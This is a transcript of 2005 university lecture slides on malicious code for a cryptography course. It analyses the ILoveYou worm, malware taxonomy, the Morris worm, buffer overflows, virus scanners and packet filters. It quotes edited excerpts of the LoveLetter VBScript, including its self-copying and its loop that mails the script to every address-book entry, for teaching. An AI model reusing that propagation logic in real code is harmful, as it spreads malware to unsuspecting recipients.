David Evans CS588: Cryptography University of Virginia Computer Science Lecture 20: Malicious Code.
-
Upload
annabel-norris -
Category
Documents
-
view
220 -
download
1
Transcript of David Evans CS588: Cryptography University of Virginia Computer Science Lecture 20: Malicious Code.
David Evanshttp://www.cs.virginia.edu/evans
CS588: CryptographyUniversity of VirginiaComputer Science
Lecture 20:Malicious Code
21 April 2005 University of Virginia CS 588 2
Menu
• Examination of ILoveYou Code
• Malicious Code Taxonomy
• Malcode Defenses Overview– Virus Scanners
21 April 2005 University of Virginia CS 588 3
LoveLetter.VBS
• This 328-line program caused ~$10B in damage
• How much work and smarts was required?
21 April 2005 University of Virginia CS 588 4
Main Looprem barok -loveletter(vbe) <i hate go to school>rem by: spyder / [email protected] /
@GRAMMERSoft Group / Manila,PhilippinesOn Error Resume Next... wscr.RegWrite "...Scripting Host\
Settings\Timeout", 0sub main()
...Set c = fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")...spreadtoemail()...
end sub
Smart virus writers don’t include their contact information.
Smart people would convey more interesting message.
This was smart – turn off scripting timeout in registry. (Dumb for Microsoft.)
21 April 2005 University of Virginia CS 588 5
spreadtoemail (edited to fit)sub spreadtoemail()
for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1
for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x)
set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = “ILOVEYOU” male.Body = “kindly check the attached
LOVELETTER coming from me.” male.Attachments.Add(dirsystem&
“\LOVE-LETTER-FOR-YOU.TXT.vbs”) male.Send
x=x+1 next nextend sub
Smart virus writers understand for loops.
Smart virus writers can spell “mail”.
21 April 2005 University of Virginia CS 588 7
Be Very Afraid...• When really dumb people with no
resources write malicious programs, it costs $10B.
• What would happen if smart people with resources wrote a malicious program?– Paper link: Staniford, Paxson & Weaver,
How to 0wn the Internet in Your Spare Time (2002)
• “Warhol worm”: 15 minutes to 0wn Internet
21 April 2005 University of Virginia CS 588 8
Attacking Malicious Code
• “Malicious Code” is a bad name– Code has no intent– Programmer’s intent doesn’t matter, what
the code does matters• As networks get more programmable,
accidentally harmful code will become common
• We’ll use “malcode” (mal = bad)– Its not a great name either...
21 April 2005 University of Virginia CS 588 9
Taxonomy of Code
All Code
Malcode Harmless Code
Created by Malicious Author
Accidental
(occasionally programs are actually useful, too)
21 April 2005 University of Virginia CS 588 10
Taxomony of Malcode[Stallings, p. 502]
Malcode
Requires Host Program Independent
VirusesViruses WormsWormsTrojan Trojan HorsesHorses
Self-Replicating
Logic Logic BombsBombs
TrapTrapDoorsDoors
Insiders
21 April 2005 University of Virginia CS 588 11
Worms and Viruses• People get into stupid arguments over
whether something is a “worm” or a “virus”– Is the Internet a host program?
• See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988
• Is Outlook a host program for an email?
• Similarly, for worms/viruses/Trojans– If the user must open it (e.g., ILoveYou) it is
self-replicating?
21 April 2005 University of Virginia CS 588 12
Trojan Horses
• Greeks and Trojans at war – Eris (Discord), Paris, Aphroditie, Helen
• Greeks attacking Troy, bombarded city for 10 years, but couldn’t get through city walls.
• Pretended to leave, left big wooden horse as gift• Trojans brought horse into city (had to tear down
part of wall to do this), got silly drunk celebrating victory.
• Greeks jumped out, killed sentries, and let in Greek army.
21 April 2005 University of Virginia CS 588 13
Modern Trojan Horses• User runs program that looks harmless
– Program pretends to be “cool, dancing bears”, also erases your hard drive
• Most attacks today are Trojan Horses– ILoveYou, Melissa, recent Microsoft attack, etc.
• Rely on modern humans being as dumb as mythical Trojans– No matter how good your city/fire walls are,
they don’t do any good if you can’t stop users from running random code
21 April 2005 University of Virginia CS 588 14
Differences between Morris Worm 1988 and Melissa/ILoveYou 1999
21 April 2005 University of Virginia CS 588 15
Vulnerabilities Exploited• Morris Worm:
– Buffer overflow: fingerd uses gets– sendmail debug mode– Weak Unix passwords
• Melissa:– Word enables macros by default, no limitations on
macro behavior
• ILoveYou:– Dumb people will run code attached to email
• Code Red/Nimda:– Buffer overflow in IIS
21 April 2005 University of Virginia CS 588 16
Buffer Overflows
Frame Pointer
Return Address
char s[64];...
int i;
gets (s);
Input more than 64 bits: gets just writes down stackbit 65: address
of bit 66 on stack
bits 66-...: instructions
int k;
21 April 2005 University of Virginia CS 588 17
Preventing Buffer Overflows• Use run-time checks on all memory references
– Safe languages (CLU, Java, Eiffel, etc.)– Safe libraries for C (don’t use gets, strcpy, etc.)
• Obfuscation– Randomize locations in memory
• Separate code and data segments– Make code segment unwriteable (once application
loaded), only allow jumps in code segment
• Static analysis– Check binary or source code
• But – about ½ of recent vulnerabilities are still buffer overflows!
21 April 2005 University of Virginia CS 588 18
Replication Strategy• Morris Worm
– Searched .forward files (should have used .rhosts) to find other hosts to attack
– Used password guessing to break into other accounts
– Used fingerd, sendmail vulnerabilites
• Melissa/ILoveYou– Emails itself to entries in victim’s Outlook
address book
21 April 2005 University of Virginia CS 588 19
Damage• Morris Worm
– Infected ~6000 computers (10% of Internet)
• Melissa– Infected 1.2 Million machines in a few hours
• ILoveYou– $10 Billion in damage
• Theorized worst case worm– ~$50B (Nicholas Weaver and Vern Paxson, A
Worst-Case Worm, WEIS 2004)
21 April 2005 University of Virginia CS 588 20
Outcomes• Internet Worm (Robert Morris, Jr.)
– 3 years suspended sentence (no jail time), $10,000 fine.
– Current occupation
• Melissa (David Smith) (~$80m damages)– Plead guilty, Dec 1999 (second successful
prosecution of virus author), link to plea agreement on manifest
– Hired by Rutgers as Computer Technician while awaiting sentencing
• ILoveYou ($10B damages)– Release without penalty, no laws in Philippines
21 April 2005 University of Virginia CS 588 21
Responses• Morris Worm
– Disconnect from network– Disorganized, phone
• Anonymous message (probably from Robert Morris) explaining how to disable virus was not noticed or distributed
– DARPA established CERT
• Melissa– CERT Advisory, Eradicated quickly
• But CERT had to rebuild Web server
• ILoveYou– Many countries have since passed laws, Europe treaty
announced last week
21 April 2005 University of Virginia CS 588 22
Malcode Defenses
1. Prevent malcode from running
2. Limit damage it can do
3. Discourage attackers
21 April 2005 University of Virginia CS 588 23
Malcode Defenses1. Prevent malcode from running
Virus scanners – recognize known malcode
Firewalls – drop incoming packets
Code signing (only run code from trusted sources)
Education – make users smarter
2. Limit damage it can doSandbox (“Playpen”) – run malcode in protected
virtual machine
Reference monitors – enforce policy on execution
Intrusion Detection, System maintenance
3. Discourage attackersLegal – pass laws to penalize attackers
Today
Tue
sday
21 April 2005 University of Virginia CS 588 25
Virus Scanners• Compare code to a database of known
malicious code– Smart authors create self-mutating viruses– Smart virus scanners try to deal with this (but
usually fail)
• Reasonably useful in days of “sneaker” net (viruses spread on floppies)
• Reasonably useless when viruses spread as fast as email
21 April 2005 University of Virginia CS 588 26
Virus Spreading
• Read email every hour
• Everyone’s address book contains 50 people
• Infects 300M
people in
6 hours!0
50000000
100000000
150000000
200000000
250000000
300000000
350000000
1 2 3 4 5 6
21 April 2005 University of Virginia CS 588 29
What Virus Scanner Peddlers Do(2001)
http://security.norton.com/
21 April 2005 University of Virginia CS 588 30
First, it tells you to lower your security settings to allow ActiveX.
21 April 2005 University of Virginia CS 588 31
Always Click “Yes”
During the download, you might see one or more messages asking if it is OK to download and run these programs. Click Yes when these messages appear.
21 April 2005 University of Virginia CS 588 35
What it Should Do
• Tell people who have ActiveX turned off, “Good Job”
• Tell people who click “OK” to run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education!
21 April 2005 University of Virginia CS 588 36
Malcode Defenses1. Prevent malcode from running
Virus scanners – recognize known malcode Firewalls – drop incoming packets Code signing (only run code from trusted sources) Education – make users smarter
2. Limit damage it can doo Sandbox (“Playpen”) – run malcode in protected
virtual machineo Reference monitors – enforce policy on executiono Intrusion Detection, System maintenance
3. Discourage attackers Legal – pass laws to penalize attackers
21 April 2005 University of Virginia CS 588 37
The Best Firewall
to network
power
Functionality is Bad
21 April 2005 University of Virginia CS 588 38
Lesser Firewall
to network
firewall (p: packet) { if (allow (p)) forward (p); else drop (p);}
21 April 2005 University of Virginia CS 588 39
Networks – OSI Model
Application
Presentation
Session
Transport
Network
Data Link
Physical
FTP SMTP HTTP RealPlayer ...
TCP UDP
IP
Ethernet FDDI CDMA Smoke Signals
Other
21 April 2005 University of Virginia CS 588 40
An IP (V4) Packet
IP V
ersion (4)
IP H
eader Length
Type of S
ervice (not used)
0
Size of
Datagram
16 32
Packet
Identification
48
Flag
s Fragm
ent O
ffset
64
TT
L Transport P
rotocol (e.g., T
CP
)
80
Header
Checksum
96
Source IP
A
ddress
Destination IP
A
ddress
Option
s Dat
a128 160
21 April 2005 University of Virginia CS 588 41
A Simple Packet Filterboolean allow (packet) {if (match (packet.source,
“18.26.4.*”)) return false; // No packets from Robert Morris’ machines. else if (match (packet.source, “149.150.209.*”))
return false; // Cheaton Hall else return true;
}
21 April 2005 University of Virginia CS 588 42
Typical Packet Filtering RulesIncoming:
permit 0.0.0.0 128.143.137.19 TCP src >= 1024 dst = 25
permit 0.0.0.0 128.143.137.19 TCP src = 25 dst >= 1024
Outgoing: permit 128.143.137.19 0.0.0.0
TCP src = 25 dst >= 1024permit 128.143.137.19 0.0.0.0
TCP src >= 1024 dst = 25
21 April 2005 University of Virginia CS 588 43
Packet Filter Layers
Application
Presentation
Session
Transport
Network
Data Link
Physical
FTP SMTP HTTP RealPlayer ...
TCP UDP
IP
Ethernet FDDI CDMA Smoke Signals
Other
21 April 2005 University of Virginia CS 588 44
Application-Layer Gateways
• Analyze communication at application layer
• All communication must go through a proxy that knows about application
• Able to detect application-level attacks
• Poor scalability, performance
• Fail-safe is annoying
21 April 2005 University of Virginia CS 588 45
Malcode on the Near Horizon• Cell Phones
– Billions of them worldwide, becoming as complex as computers were in 1988
– About 60% run Symbian OS
• Cabir (November 2004) – spread using Bluetooth (short range networking) on Symbian OS (but required user agreement)
• CommWarrior (March 2005) – spread using phone network (multimedia messages), contact list
• Today: spread limited – only 2% of phones are “smartphones” (this will change soon!)
21 April 2005 University of Virginia CS 588 46
Malcode Summary• Best defense is education• Next best defense is a good offense
– Tough legal penalties for convicted attackers– Doesn’t work against motivated foreign
governments
• Some Technical Defenses– Virus Scanners– Tuesday:
• Reference Monitors, Proof-Carrying Code• Firewalls, Intrusion Detection
21 April 2005 University of Virginia CS 588 47
Charge• Project Presentations will be final class: Tuesday,
May 3• Normal project expectation:
– Your team will make a presentation on May 3 (up to 15 minutes, can be as short at 5)
– You will hand in a paper report on May 3– You will put up a web page (that could just be the
same as your paper report)
• Take home final out May 3, due May 7– Some public-key cryptosystems questions– Something involving hash chains– One essay question (security analysis)